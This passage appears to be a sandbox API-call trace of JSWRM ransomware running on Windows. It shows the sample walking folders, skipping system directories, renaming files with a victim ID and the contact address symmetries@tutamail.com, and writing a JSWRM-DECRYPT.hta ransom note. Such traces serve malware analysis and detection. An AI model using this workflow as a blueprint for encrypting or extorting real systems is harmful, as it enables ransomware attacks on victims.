hHeap=0x1e0000) returned 1 [0068.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.333] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10087469431380592) returned 0 [0068.333] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.333] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.333] CloseHandle (hObject=0xffffffff) returned 1 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0068.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.334] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.334] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.334] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.334] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2=".") returned 1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="..") returned 1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="...") returned 1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="windows") returned -1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="recovery") returned -1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="perflogs") returned -1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="documents and settings") returned 1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="$RECYCLE.BIN") returned 1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="system volume information") returned -1 [0068.334] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="msocache") returned -1 [0068.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrcommonlm.dat", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrcommonlm.dat", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrcommonlm.dat", lpUsedDefaultChar=0x0) returned 15 [0068.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrcommonlm.dat", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrcommonlm.dat", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrcommonlm.dat", lpUsedDefaultChar=0x0) returned 15 [0068.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.335] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.336] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.336] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.336] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.336] CloseHandle (hObject=0xffffffff) returned 1 [0068.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.337] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.337] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6eba2ec1, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2=".") returned 1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="..") returned 1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="...") returned 1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="windows") returned -1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="recovery") returned -1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="perflogs") returned -1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="documents and settings") returned 1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="$RECYCLE.BIN") returned 1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="system volume information") returned -1 [0068.337] lstrcmpiW (lpString1="HWRCustomization", lpString2="msocache") returned -1 [0068.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0068.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\jswrm-decrypt.hta")) returned 0xffffffff [0068.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0068.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.338] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.338] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.338] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.339] CloseHandle (hObject=0x454) returned 1 [0068.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0068.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.340] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\jswrm-decrypt.hta")) returned 0x20 [0068.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0068.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.341] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f64d72d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0068.341] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.341] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6eba2ec1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xa07693a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f64d72d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0068.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.342] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f64d72d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f64d72d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f64d72d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.342] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0068.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.342] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f64d72d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f64d72d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f64d72d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.342] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0068.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0068.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.343] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x60002, 